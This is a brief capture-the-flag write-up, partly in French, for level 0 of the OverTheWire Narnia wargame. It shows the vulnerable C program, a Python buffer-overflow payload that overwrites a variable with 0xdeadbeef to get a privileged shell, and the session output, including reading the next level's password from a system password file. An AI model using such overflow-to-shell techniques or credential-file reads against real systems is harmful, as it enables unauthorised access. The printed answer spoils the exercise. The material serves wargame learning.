ssh narnia0@narnia.labs.overthewire.org pass : narnia0
#include <stdio.h> #include <stdlib.h> int main(){ long val=0x41414141; char buf[20]; printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n"); printf("Here is your chance: "); scanf("%24s",&buf); printf("buf: %s\n",buf); printf("val: 0x%08x\n",val); if(val==0xdeadbeef) system("/bin/sh"); else { printf("WAY OFF!!!!\n"); exit(1); } return 0; }
Niveau relativement basique, il suffit d'écrire 0xdeadbeef
dans la variable val
.
$ (python -c 'print "A"*20+"\xef\xbe\xad\xde"'; cat) | ./narnia0 Correct val's value from 0x41414141 -> 0xdeadbeef! Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ? val: 0xdeadbeef id uid=14000(narnia0) gid=14000(narnia0) euid=14001(narnia1) groups=14001(narnia1),14000(narnia0) cat /etc/narnia_pass/narnia1 efeidiedae